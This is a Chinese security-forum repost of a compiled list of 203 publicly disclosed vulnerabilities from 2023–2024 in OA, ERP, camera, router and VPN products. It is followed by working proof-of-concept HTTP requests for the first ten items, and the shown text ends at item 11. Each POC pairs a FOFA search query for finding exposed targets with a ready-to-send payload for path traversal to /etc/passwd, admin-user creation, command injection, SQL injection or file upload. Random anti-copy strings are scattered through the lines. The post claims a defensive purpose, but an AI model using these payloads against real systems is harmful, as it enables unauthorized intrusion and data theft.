中国网络渗透测试联盟

标题: 互联网公开漏洞整理202309-202406--转载 [打印本页]
作者: admin    时间: 2024-6-5 14:31
标题: 互联网公开漏洞整理202309-202406--转载
互联网公开漏洞整理202309-2024063 D6 w3 e8 }7 C
道一安全 2024-06-05 07:41 北京# F3 V, j/ ]4 H8 B# y/ _& ?, }4 X) _
以下文章来源于网络安全新视界 ,作者网络安全新视界
5 L9 G5 @0 P# _2 F6 F6 }, ^, q2 _: a9 Z  Y! `% x& B
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。7 e" l2 o; G7 I: x. a* l
" C. B; ^: K+ `2 h% m
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
  \4 c1 ^% Z. P' J# }. d+ H' i0 z6 ]; L. ~* r
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
& P4 R% J5 m! v. ^# V" G$ [9 m9 i0 s1 ?$ y
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。( W/ a# e1 i* |$ j
$ e2 t! y8 ^/ I# S. @' B
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。5 ~/ g6 H8 z9 G  c

  G8 T" d- z% ]: b* C6 \7 ^' e, v+ F0 \& W( c8 e! @
声明
7 b, b" W/ I, b. j$ O, R" ]. z+ x. F- U
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
1 d4 I( v9 U. ?' k, `; c0 J& y, Y' V* T' L
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
2 b! h4 u; [- B9 R
' l. m! Y4 u, s. @) }5 S4 Z2 O3 Q; a/ L) y
5 S& S: \9 L& G$ ]- s0 V$ S
目录* \, o" F3 W: j: m' s

" E' P. x5 Q/ B# W5 ?$ e01
7 ~! z+ u  |# d+ d; @- t1 Q# S
$ o6 H% C7 P1 B+ [1. StarRocks MPP数据库未授权访问
+ }. T6 U( A1 a, y* w- Y% ^' S2. Casdoor系统static任意文件读取
8 n' F- `) y9 Y: n3. EasyCVR智能边缘网关 userlist 信息泄漏
" f2 e6 ^" u' ^. D' U1 D4. EasyCVR视频管理平台存在任意用户添加
; \% N# c2 ~$ J; \5 f2 `+ a5. NUUO NVR 视频存储管理设备远程命令执行+ `) H0 X6 p4 \  h) V1 j
6. 深信服 NGAF 任意文件读取  z. }% k2 w+ U8 A6 G
7. 鸿运主动安全监控云平台任意文件下载
' O! \! }8 j' r8. 斐讯 Phicomm 路由器RCE: L9 n! u" D- E& L5 V
9. 稻壳CMS keyword 未授权SQL注入8 `  ?1 [- \9 }
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传9 o4 e6 B. I' o5 i0 I) N2 h
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入6 b' g( \+ Q. @1 }8 ?
12. Jorani < 1.0.2 远程命令执行
2 T3 [# b" Y, R) G2 q0 {, U7 r4 z13. 红帆iOffice ioFileDown任意文件读取2 [# _6 `8 Z6 ^; u# y: e8 ~
14. 华夏ERP(jshERP)敏感信息泄露
" d& p3 m) ]' m6 e& M15. 华夏ERP getAllList信息泄露
+ ~- H5 s' _; e- T% p9 S% C: G16. 红帆HFOffice医微云SQL注入
" U+ g! f2 |. f; q17. 大华 DSS itcBulletin SQL 注入
' }+ c5 w. P( l; v8 g- F18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
. M2 B. d5 M, d# y6 X3 W7 O19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
3 T& d& U; ]3 M% J! t0 g20. 大华ICC智能物联综合管理平台任意文件读取6 I+ r, C* J2 t+ Z+ J4 c
21. 大华ICC智能物联综合管理平台random远程代码执行# d2 G/ J# q) s( @6 K
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
! O2 v1 X. G& L: A23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
0 g* q5 W" `! u+ ^9 P& r24. 用友NC 6.5 accept.jsp任意文件上传
" H3 T& H& l* U- C+ F25. 用友NC registerServlet JNDI 远程代码执行
- z$ u' U5 S: D/ c: P, N26. 用友NC linkVoucher SQL注入
0 i* c( m, G. C& x27. 用友 NC showcontent SQL注入3 P' ^1 t* P: |  Z
28. 用友NC grouptemplet 任意文件上传
$ g  o# y* g; \' q; P3 q1 U29. 用友NC down/bill SQL注入
; R  M- ]! j3 f4 P5 j+ r30. 用友NC importPml SQL注入( ^& {7 x& [+ o$ `6 H( t- F, a
31. 用友NC runStateServlet SQL注入
6 O: Z1 a9 ~, S6 \3 l0 b( P32. 用友NC complainbilldetail SQL注入0 X! e& S5 t- M2 Y) R
33. 用友NC downTax/download SQL注入6 e/ [( P  N% @
34. 用友NC warningDetailInfo接口SQL注入  ?) N5 x. G7 }
35. 用友NC-Cloud importhttpscer任意文件上传( k, j  }/ e/ Q  d2 n  X
36. 用友NC-Cloud soapFormat XXE
* c1 k$ j- }& W5 s37. 用友NC-Cloud IUpdateService XXE- O0 g  [7 ~3 g4 e/ J( V" {# k
38. 用友U8 Cloud smartweb2.RPC.d XXE# o6 @% S, _9 |* E: ], G
39. 用友U8 Cloud RegisterServlet SQL注入
# m8 \6 e1 @* B40. 用友U8-Cloud XChangeServlet XXE( S& |3 Z5 J6 z0 J4 r
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入' S7 |. ~2 B5 I% I
42. 用友GRP-U8 SmartUpload01 文件上传6 J+ \8 H% U+ I' X: l/ {
43. 用友GRP-U8 userInfoWeb SQL注入致RCE: |" p- z( y* [' D% j7 X
44. 用友GRP-U8 bx_dj_check.jsp SQL注入* Q  t4 u7 l; o  s7 a
45. 用友GRP-U8 ufgovbank XXE( \9 x/ `4 W' s( G* R0 N
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
( f' \8 M2 ]6 |. p47. 用友GRP A++Cloud 政府财务云 任意文件读取% p. e# \4 i0 u) B/ v$ D
48. 用友U8 CRM swfupload 任意文件上传" D* E5 d2 \& S- r3 \! l- c
49. 用友U8 CRM系统uploadfile.php接口任意文件上传8 E' n1 k7 _, d) I% b* J2 F0 N
50. QDocs Smart School 6.4.1 filterRecords SQL注入3 U) @, R* ~- P  z/ M
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
$ }( l. c4 k* h* [7 x+ n. t$ K52. 泛微E-Office json_common.php sql注入
1 g6 P" m) n# ]0 e53. 迪普 DPTech VPN Service 任意文件上传
  `  K. W1 O& a1 A+ ^54. 畅捷通T+ getstorewarehousebystore 远程代码执行
3 i$ y5 r2 n1 [9 X55. 畅捷通T+ getdecallusers信息泄露
; R9 [( o0 z  H, g7 u  c56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE# C& e2 |7 _/ ]; o) P2 E
57. 畅捷通T+ keyEdit.aspx SQL注入
) n# S# D2 B# f/ z58. 畅捷通T+ KeyInfoList.aspx sql注入
) K; s2 p' [/ d! E* r% M59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
& O4 e; k7 |+ J& a) @/ A3 z60. 百卓Smart管理平台 importexport.php SQL注入
  f. F7 D) d* y3 n% ]+ F& \/ ?61. 浙大恩特客户资源管理系统 fileupload 任意文件上传; o. D0 @* z. P3 [+ h; i+ I  m; s
62. IP-guard WebServer 远程命令执行
8 D' O4 e# P6 N63. IP-guard WebServer任意文件读取
& ~: K( y( A" x64. 捷诚管理信息系统CWSFinanceCommon SQL注入4 J2 B: K3 ~6 t
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
& B9 A; d0 x, v" P66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入* c1 \) V% d/ l5 r
67. 万户ezOFFICE wpsservlet任意文件上传* n; g5 B! J9 m7 {
68. 万户ezOFFICE wf_printnum.jsp SQL注入$ y' `, D- w! @8 y( p& h
69. 万户 ezOFFICE contract_gd.jsp SQL注入% U9 \0 c$ e5 G. \8 `
70. 万户ezEIP success 命令执行3 M5 v6 P7 D8 j8 j2 ~1 W2 e
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
- `2 J, `2 l1 W72. 致远OA getAjaxDataServlet XXE
+ u$ H& X! ~0 r- P2 {7 J' L6 Q! _9 v73. GeoServer wms远程代码执行
1 x9 N0 y0 ~* ], I& j/ E1 ]74. 致远M3-server 6_1sp1 反序列化RCE  f1 _# A- a6 [& J) y
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
. w* w! @5 u. Y$ S5 Q  Q; s5 v76. 新开普掌上校园服务管理平台service.action远程命令执行9 ~6 I1 k% T0 N5 s% U9 {; n
77. F22服装管理软件系统UploadHandler.ashx任意文件上传( i* |$ }3 ^7 H2 X  h
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传5 r: e3 R7 `9 j" h; U6 S! u
79. BYTEVALUE 百为流控路由器远程命令执行. H5 N; x/ S% s# W
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
: j) G, u2 E$ d3 a: B& G81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
' l. u0 A; D3 c82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行# K, P  m3 c3 V0 r
83. JeecgBoot testConnection 远程命令执行) A& `) [* E8 n, J8 B
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入: ?+ ?' W& F0 E+ ?8 n4 l
85. SysAid On-premise< 23.3.36远程代码执行
* d/ p+ h. n7 Z86. 日本tosei自助洗衣机RCE
0 E8 E& @6 P/ g7 r  O1 e1 Q0 e87. 安恒明御安全网关aaa_local_web_preview文件上传
& q8 l6 q3 f1 d5 e  M! \! b88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行9 z5 c4 e) n- ~5 D
89. 致远互联FE协作办公平台editflow_manager存在sql注入
8 ~  g5 a0 D$ f& L/ o90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行0 Y/ E) l2 G5 F8 z( X
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取$ z7 Z' h0 H( F* z7 b2 P
92. 海康威视运行管理中心session命令执行1 u/ Z/ z( \$ k4 q% ~
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
- z% Q; }7 M* s  n1 g94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传4 i4 \* e& d/ m" k3 Q
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行1 ?8 e& F- U* ^5 {$ Y
96. Apache OFBiz  18.12.11 groovy 远程代码执行
7 @3 ?& [* E2 U# j0 A" Q97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行+ B; n& b( g3 W
98. SpiderFlow爬虫平台远程命令执行  G9 f% J7 q- d  S
99. Ncast盈可视高清智能录播系统busiFacade RCE
0 a) L# R' U$ ?100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
6 w( V6 D) X8 l  D; O0 Y4 j101. ivanti policy secure-22.6命令注入
4 |7 a0 L/ u+ |" M+ f102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行2 ?9 o' ]0 v" n# @" m
103. Ivanti Pulse Connect Secure VPN XXE
1 g) G- T, [: S104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
. I6 o, M6 S" ^! D105. SpringBlade v3.2.0 export-user SQL 注入# D4 Z8 j3 C0 [, L" D9 g
106. SpringBlade dict-biz/list SQL 注入) p* Y& k: T5 Z+ v- ^( m2 k5 k
107. SpringBlade tenant/list SQL 注入) t+ c& P8 g& p' Q2 r% p2 ?
108. D-Tale 3.9.0 SSRF, m- @1 t: _" p, ]% r
109. Jenkins CLI 任意文件读取9 e9 `, ^) U) k7 z% B1 C5 p
110. Goanywhere MFT 未授权创建管理员
9 p" J8 `1 @0 x9 Q& _' }111. WordPress Plugin HTML5 Video Player SQL注入) d' C( W# v3 ^
112. WordPress Plugin NotificationX SQL 注入9 C' }% b& a* I& O: z# z; M
113. WordPress Automatic 插件任意文件下载和SSRF
5 s' v0 W2 X- |0 N" g  T114. WordPress MasterStudy LMS插件 SQL注入3 Y3 b( F4 k6 H9 D  ^
115. WordPress Bricks Builder <= 1.9.6 RCE4 N. \1 R4 \  h5 P! H! E
116. wordpress js-support-ticket文件上传8 _( n& E5 t  |; H7 i! j
117. WordPress LayerSlider插件SQL注入0 j. F+ i' |- Y7 y% S
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传5 |& I) C( o- a: F! [' W. ^' I" E& r) P
119. 北京百绰智能S20后台sysmanageajax.php sql注入
. l& a. b" L% D# A- b# @120. 北京百绰智能S40管理平台导入web.php任意文件上传# n* b- y, ~" `  V* t
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
. l5 z; u9 z; c# {7 b' {3 K) ?122. 北京百绰智能s200管理平台/importexport.php sql注入% F- D9 u& q- h! p  ?- H8 z
123. Atlassian Confluence 模板注入代码执行' h6 c. B; }5 O# c  l
124. 湖南建研工程质量检测系统任意文件上传# U0 c; j# x9 j3 q
125. ConnectWise ScreenConnect身份验证绕过) b/ d/ V+ l! f
126. Aiohttp 路径遍历% l( `5 e( f4 Q/ c; _/ u
127. 广联达Linkworks DataExchange.ashx XXE0 O" m/ T/ ]7 B" m* Z
128. Adobe ColdFusion 反序列化
; \5 _5 a. L. z- }* H129. Adobe ColdFusion 任意文件读取
% h7 E0 }/ h  x7 C, Y- Z1 }# Q130. Laykefu客服系统任意文件上传
. S/ e  `  m) H6 Z5 d131. Mini-Tmall <=20231017 SQL注入
1 V: ?8 Q$ G0 Q% e" i( ~- Y+ ?132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过, ^. N8 ~  M9 X" C# i  b9 b, F
133. H5 云商城 file.php 文件上传% C; w, E* Y) G6 u6 F6 Z
134. 网康NS-ASG应用安全网关index.php sql注入3 `0 v& L& i# o# a9 f1 Q( t
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入; F( }, F6 R: ^6 V0 J: z' E
136. NextChat cors SSRF4 p% V* F" q, v& j% _( J$ p
137. 福建科立迅通信指挥调度平台down_file.php sql注入
7 Z/ O& j+ A6 _- @( G138. 福建科立讯通信指挥调度平台pwd_update.php sql注入( L' ?9 J3 c5 a3 Z
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
1 ^* d, S3 n8 `( q3 k( x140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入& u  U1 b( Z0 [8 V$ {7 b4 N+ X  D, g
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
# M! h2 e5 Z) Z( R6 E& `142. CMSV6车辆监控平台系统中存在弱密码
1 Y! @$ w" a9 f9 R' F143. Netis WF2780 v2.1.40144 远程命令执行& ~7 U& Q( t1 D: p5 w
144. D-Link nas_sharing.cgi 命令注入5 a# B. j" Y/ F
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
, Z: R# M' g* N2 H146. MajorDoMo thumb.php 未授权远程代码执行; G+ g" v: N! q% p/ Y# Z
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
: v4 o( o0 `* k( J% F. b4 t148. CrushFTP 认证绕过模板注入" A& t, l4 @* m3 b$ U* x% }8 C6 l
149. AJ-Report开源数据大屏存在远程命令执行' V3 Y/ U$ z( _; K
150. AJ-Report 1.4.0 认证绕过与远程代码执行3 R) w9 w8 P  }! Y! z2 b+ S, }$ I- [/ w
151. AJ-Report 1.4.1 pageList sql注入
) d. @3 X: C$ u1 R/ ?1 @152. Progress Kemp LoadMaster 远程命令执行; N% c, ]$ q; f+ V' T
153. gradio任意文件读取
, a0 {6 z4 {, }4 p* T" m9 U0 w154. 天维尔消防救援作战调度平台 SQL注入
2 k+ Q& w* z/ O155. 六零导航页 file.php 任意文件上传+ ^/ p$ ~* z4 w6 ~- ^1 d
156. TBK DVR-4104/DVR-4216 操作系统命令注入
% A9 s6 [8 I; g" g, M3 K& P; O157. 美特CRM upload.jsp 任意文件上传
( s6 L& e! |: U* O9 q( l& e2 t158. Mura-CMS-processAsyncObject存在SQL注入
" T! u( r  @4 [+ I& O3 r159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
' f- D* ^6 C+ [' P9 z; ?( k160. Sonatype Nexus Repository 3目录遍历与文件读取
( ?3 x% U+ v9 w5 Z' k7 X7 T4 L161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
$ }9 U! k" t1 A, r9 |162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传" w& ^( D+ ^$ i2 j
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传1 Y6 S$ B% I# B; j  Y
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传3 l  O1 N' e) [+ K1 h& T
165. OrangeHRM 3.3.3 SQL 注入
# U7 o% D% F" y- @4 D166. 中成科信票务管理平台SeatMapHandler SQL注入# M$ i* o3 ~( D9 r- L
167. 精益价值管理系统 DownLoad.aspx任意文件读取: c; Q; T# q: w$ m, M
168. 宏景EHR OutputCode 任意文件读取' S2 U% i7 r) y5 t
169. 宏景EHR downlawbase SQL注入# ^7 s9 S: c: K8 r  Z
170. 宏景EHR DisplayExcelCustomReport 任意文件读取- z9 Q0 o- o  {3 u. Y
171. 通天星CMSV6车载定位监控平台 SQL注入
) `; }& s7 J6 C: [  P& L! N& c172. DT-高清车牌识别摄像机任意文件读取
5 F! [$ O% G% X6 @' g8 k173. Check Point 安全网关任意文件读取6 Q3 D! q4 k) ]$ u# L: C
174. 金和OA C6 FileDownLoad.aspx 任意文件读取9 J8 k+ _- }& B
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
% Y' w' C% S$ r176. 电信网关配置管理系统 rewrite.php 文件上传
1 r! U5 L- X/ Q1 y177. H3C路由器敏感信息泄露6 }( h) {4 j* U
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
1 T% ]2 U& E: J0 N3 y+ K4 ^179. 建文工程管理系统存在任意文件读取
1 I1 _- t0 W/ f) G0 h: o, `180. 帮管客 CRM jiliyu SQL注入
! D1 s- y  g: Y, v! l) w0 h181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
/ D) d0 N1 S- i/ E7 Y  d( \182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
( @* d0 H/ C: c6 t7 o. \183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入* U# i$ a* V+ E3 K" d4 f$ b( Z
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
0 _9 P0 G; u  O. |! ~2 U' k185. 瑞友天翼应用虚拟化系统SQL注入) R7 J5 U( m. p, @5 g- t
186. F-logic DataCube3 SQL注入
. G. ]* e2 ]; g187. Mura CMS processAsyncObject SQL注入
) W: ^& c& Y* _, a2 F188. 叁体-佳会视频会议 attachment 任意文件读取
' p9 d* R, o- }6 c! |% w4 |189. 蓝网科技临床浏览系统 deleteStudy SQL注入
- g' V: |" u- k  e5 C5 [190. 短视频矩阵营销系统 poihuoqu 任意文件读取; z1 c; |, A* W# m' {
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
, `& }: ~2 j6 ]) i9 `' k- E192. 富通天下外贸ERP UploadEmailAttr 任意文件上传" o, W  c, x- g. [" G, H: Y
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行3 e1 |5 d7 Z! D5 J7 ^+ r( C4 ~2 F
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传# f! p1 N4 i4 C1 f& K
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
2 _+ a7 N5 H; G& L8 g" g7 I8 ?196. 河南省风速科技统一认证平台密码重置
; K/ M0 E  C, `, `4 ]$ n5 O197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
& ]' p5 E! R" m0 ]4 _* _198.  阿里云盘 WebDAV 命令注入1 ~. G  N3 }4 q- z' D/ W% ~
199. cockpit系统assetsmanager_upload接口 文件上传4 f, S9 p5 c" `4 @' _
200. SeaCMS海洋影视管理系统dmku SQL注入' _. k/ c; G% n" ?( G' h
201. 方正全媒体新闻采编系统 binary SQL注入
" T4 J. ?* {. c* C3 I, {% d202. 微擎系统 AccountEdit任意文件上传
/ F8 f: i! L0 J; j2 [203. 红海云EHR PtFjk 文件上传2 ?# s' _* }% N7 H8 P! X2 e8 u
( s) f  c& n5 A; P" p
POC列表
: z! o2 F0 Y, e' F4 K/ {% d" s, m7 ]; N+ J% |/ t
02: a5 W% h& F+ o
' e  R7 Z+ O' D1 r
1. StarRocks MPP数据库未授权访问
2 T/ U- h/ O: i+ \, t0 |8 VFOFA :title="StarRocks"
: i8 x/ `8 F8 M9 c5 }GET /mem_tracker HTTP/1.1. V# n' R! @9 ^7 X9 ~
Host: URL6 g, P; T2 s4 e

0 H2 Q/ g, k( N: k/ w+ g8 ?. o! [* `# t% C
2. Casdoor系统static任意文件读取3 G/ y+ K$ n' w; S/ Z
FOFA :title="Casdoor"+ ^$ x! q# ~, ^- N! `' l
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.12 E- w6 R" f! @
Host: xx.xx.xx.xx:9999
# X7 C& i- F; J- d, e) iUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; x: ]& @/ D. E; {! N
Connection: close. j) L3 R+ O$ D9 i
Accept: */*+ k/ z/ h4 K" s7 H
Accept-Language: en
" l' U( `0 n$ XAccept-Encoding: gzip
# {" ]1 i6 h( @& F6 y
( u6 G% G5 ?+ H! }6 r1 ^) _4 l2 ?, L3 U; K/ \: {- ?. l8 O3 [
3. EasyCVR智能边缘网关 userlist 信息泄漏/ `+ b3 p4 U2 k: g' X/ Y  {) T& W4 B0 P
FOFA :title="EasyCVR"  n; Y3 U* ]& D- Y& R4 p
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
1 U+ X9 |; ~8 N% \5 d5 O, V- a1 [Host: xx.xx.xx.xx" U+ c; e' v$ M4 x1 O
; q6 X! J# ?0 R, D3 n2 }0 V4 l5 f
5 E0 l5 J  e7 d/ S0 R
4. EasyCVR视频管理平台存在任意用户添加% R/ [% D# {8 U6 a# U7 j) {
FOFA :title="EasyCVR") D/ x3 k3 ]* x' j  T

( a: T" `) q6 [5 h" B5 `3 r" R* Rpassword更改为自己的密码md5
1 t; B# n) V* y) u* @, fPOST /api/v1/adduser HTTP/1.1
1 L' l1 O2 X7 m- F8 hHost: your-ip
/ @) Z' M, A% O1 _# A7 c# sContent-Type: application/x-www-form-urlencoded; charset=UTF-8* f: n; B7 U1 ]/ j/ D" R

2 L5 E% ~; Q: A4 Wname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
8 x( I% W. i$ p8 }) E7 X* g
; M  _3 I. M: s
$ b# ~: y- q* ^5. NUUO NVR 视频存储管理设备远程命令执行
. U- G  u) y7 q! UFOFA:title="Network Video Recorder Login"" \. t) o: s9 S' ^/ T7 x6 b2 X/ w
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
' ^' n+ ~5 b7 W; {7 ^& bHost: xx.xx.xx.xx) |$ e: |+ u% n3 L6 ]) z/ x8 U

$ h2 ]5 q' S6 }! I9 s0 c% I6 p2 s, f# M
6. 深信服 NGAF 任意文件读取
  X6 ]) ~+ E  t7 s' HFOFA:title="SANGFOR | NGAF"4 d3 `8 J/ @. {$ z# M( d
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
; Y1 n) x6 Z4 n- q/ u7 |- i) GHost:
, Q2 g9 M# P6 Z/ h9 ^
' b9 l) U8 I! @3 \
3 F/ ?% L  \4 P3 p/ s7. 鸿运主动安全监控云平台任意文件下载* U4 t3 h* r  J& Q* X: {2 W, z
FOFA:body="./open/webApi.html"5 \0 X7 M! L3 W- B: x
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.14 O9 g: B, d/ d( w7 |# r( z
Host:* \5 i- U* C; t+ k9 _! g% }
! T8 S, V+ w7 q' ^$ `, {
( t5 d& ?' b4 t, K4 E1 h2 e
8. 斐讯 Phicomm 路由器RCE
' B4 V3 L* }* l* ^+ p2 V+ Q  g8 UFOFA:icon_hash="-1344736688"
* Z% J  V( l4 D+ w- e! E; ^0 |默认账号admin登录后台后,执行操作0 ?2 o) G. N/ a* }" B
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
5 Q) [6 A) I+ X# oHost: x.x.x.x
4 ^# F6 Q; E# k, pCookie: sysauth=第一步登录获取的cookie
7 G, M- l, ?! E; u3 j( p# E& YContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
8 e  A# {$ f9 \! d! ]User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
' a+ [5 _5 l% @$ F% U" u
3 P6 a. `2 ^" j4 L8 V" v& E------WebKitFormBoundaryxbgjoytz7 C. n+ k! s( O! G
Content-Disposition: form-data; name="wifiRebootEnablestatus"
1 V, R+ [3 r# {' `
  r" c4 P8 _; M& F; y+ F%s
$ |% d1 ~" c0 i8 I------WebKitFormBoundaryxbgjoytz, N' ~$ Q) A# @& l
Content-Disposition: form-data; name="wifiRebootrange"
/ N: f. F' a5 A: a/ `7 p! M7 O) |+ \& X: ?# x% @! e
12:00; id;
$ g, ]' j( t: M* z2 i------WebKitFormBoundaryxbgjoytz
+ \0 T; M/ u- d; VContent-Disposition: form-data; name="wifiRebootendrange"
" ]/ h# t9 Z  q( j* c6 W
" l- p) F1 D1 a* a. U/ S0 h%s:
' R6 ]2 l/ W2 n. d------WebKitFormBoundaryxbgjoytz
: w2 D6 ~' |. v# YContent-Disposition: form-data; name="cururl2"& c! p1 B1 v* @' t. X
) L' K* H6 P& R# G" N: ?2 w+ L0 J

- _5 C8 ~+ j, u: ]2 N' d------WebKitFormBoundaryxbgjoytz--
' G+ U, `* L: V, X$ B8 _3 J8 \5 i0 a% [
( ]  y2 X$ Q2 i0 \* I
9. 稻壳CMS keyword 未授权SQL注入
0 b1 H9 n, r6 CFOFA:app="Doccms"( }$ p' F" c/ m+ o$ h; R' Y1 K' _. m
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1# N6 [  i/ w$ m1 R1 Y& k9 ~
Host: x.x.x.x' r+ R; x: y/ [( Q! v% t4 G5 N4 S
, r5 x  t% ^1 Z& P; g2 V

& A  w1 m& v: m- a5 ]1 x0 Ypayload为下列语句的二次Url编码* ]# r( P7 {  f9 w. a3 Y* b1 [$ u/ j
$ I! s+ c1 z4 Z
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#; f; A& g5 m: Z+ k$ a

# z: f! V* G1 Y6 P) I10. 蓝凌EIS智慧协同平台api.aspx任意文件上传$ I5 w; z6 V1 x# x3 c8 v7 m% W
FOFA:icon_hash="953405444"
% v  B4 C2 b8 T8 W* A' _! c9 ], Y  |: V9 z
文件上传后响应中包含上传文件的路径
) i2 T1 ]+ {3 w. C. P( ]POST /eis/service/api.aspx?action=saveImg HTTP/1.1! g$ u" R" a: M5 V
Host: x.x.x.x:xx
3 @, ]' {9 ]# }! DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
3 J8 T7 ?" H+ @) \3 s9 N: {Content-Length: 197
' Y; X5 `4 }% x4 z: mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  u, c% U1 m- G3 I; F  ^Accept-Encoding: gzip, deflate
$ X0 z$ d. j5 y; w4 Q# {1 a' eAccept-Language: zh-CN,zh;q=0.9+ I2 i1 D8 T0 H' U$ N" b
Connection: close
  t; ~% ?, a7 j9 n+ eContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu1 F) F) B  E$ A

/ Q: e' m' L! V  x2 m/ O  Z- E- |------WebKitFormBoundaryxdgaqmqu; }% D! o- x! `" D
Content-Disposition: form-data; name="file"filename="icfitnya.txt"! V% W% f8 F, C' T! C" q8 Z' T
Content-Type: text/html( R* b( F4 X, ^* G" R' u* V7 v

# ?' D) D: V7 p( U6 T& U0 ]jmnqjfdsupxgfidopeixbgsxbf
7 I% l* e' m5 B) j( O$ j; `4 t------WebKitFormBoundaryxdgaqmqu--' g& j$ r1 `" L% i& M% |! O9 s" s
, g# F1 Z6 U0 |+ r7 p
: V3 k% S# X. v% S+ \
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入' z9 ^# `4 \5 Y& H; ^0 v
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
